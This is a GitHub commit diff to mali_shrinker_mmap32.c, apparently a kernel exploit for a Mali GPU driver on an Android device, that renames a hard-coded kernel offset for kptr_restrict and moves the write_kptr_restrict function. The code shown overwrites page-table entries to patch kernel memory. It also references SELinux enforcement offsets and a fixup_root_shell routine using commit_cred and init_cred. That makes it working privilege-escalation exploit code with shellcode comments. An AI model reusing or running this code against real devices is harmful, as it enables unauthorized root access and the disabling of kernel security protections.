KPTR_RESTRICT定義位置変更

Signed-off-by: yuu <46545607+mouseos@users.noreply.github.com>
SmileTabLabo · May 9, 2024 · ca8239a · ca8239a
1 parent 38c4ec6
commit ca8239a
Showing 1 changed file with 17 additions and 15 deletions.
diff --git a/mali_shrinker_mmap32.c b/mali_shrinker_mmap32.c
@@ -80,13 +80,13 @@
 // avc_denied.isra.4
 #define AVC_DENY_neo \
   0x35acc8  // 0xffffff80083dacc8 - 0xffffff8008080000 = 0x35ACC8;//add
-#define KPTR_RESTRICT \
+#define KPTR_RESTRICT_neo \
   0x1147178 // どうやって求めたのか不明（ghidraで調べた？）
 static uint64_t sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_neo;
 static uint64_t sel_read_enforce = SEL_READ_ENFORCE_neo;
 static uint64_t selinux_enforcing = SELINUX_ENFORCING_neo;
 static uint64_t avc_deny = AVC_DENY_neo;
-static uint64_t kptr_restrict = 0x1147178
+static uint64_t kptr_restrict = KPTR_RESTRICT_neo;
 static uint64_t selinux_enforcing_READ = 0X0;
 static uint64_t selinux_enforcing_WRITE = 0X0;
 /*
@@ -460,20 +460,7 @@ uint32_t write_adrp(int rd, uint64_t pc, uint64_t label) {
   adpr |= (immhi_mask & (immhi << 5));
   return adpr;
 }
-void write_kptr_restrict(int mali_fd, int mali_fd2, uint64_t pgd,
-                   uint64_t* reserved) {
-  uint64_t kptr_restrict_addr =
-      (((kptr_restrict + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT) | 0x443;
-  write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t),
-           kptr_restrict_addr, atom_number++,
-           MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);
 
-  usleep(300000);
-  // shellcode
-  write_data(mali_fd2, kptr_restrict, reserved,
-             TOTAL_RESERVED_SIZE / RESERVED_SIZE, 0,
-             MALI_WRITE_VALUE_TYPE_IMMEDIATE_32);
-}
 void fixup_root_shell(uint64_t init_cred, uint64_t commit_cred,
                       uint64_t read_enforce, uint32_t add_init,
                       uint32_t add_commit) {
@@ -650,6 +637,21 @@ void write_func(int mali_fd, uint64_t func, uint64_t* reserved, uint64_t size,
   }
 }
 
+void write_kptr_restrict(int mali_fd, int mali_fd2, uint64_t pgd,
+                   uint64_t* reserved) {
+  uint64_t kptr_restrict_addr =
+      (((kptr_restrict + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT) | 0x443;
+  write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t),
+           kptr_restrict_addr, atom_number++,
+           MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);
+
+  usleep(300000);
+  // shellcode
+  write_data(mali_fd2, kptr_restrict, reserved,
+             TOTAL_RESERVED_SIZE / RESERVED_SIZE, 0,
+             MALI_WRITE_VALUE_TYPE_IMMEDIATE_32);
+}
+
 int run_enforce() {
   char result = '2';
   printf("run_enforce: before sleep\n");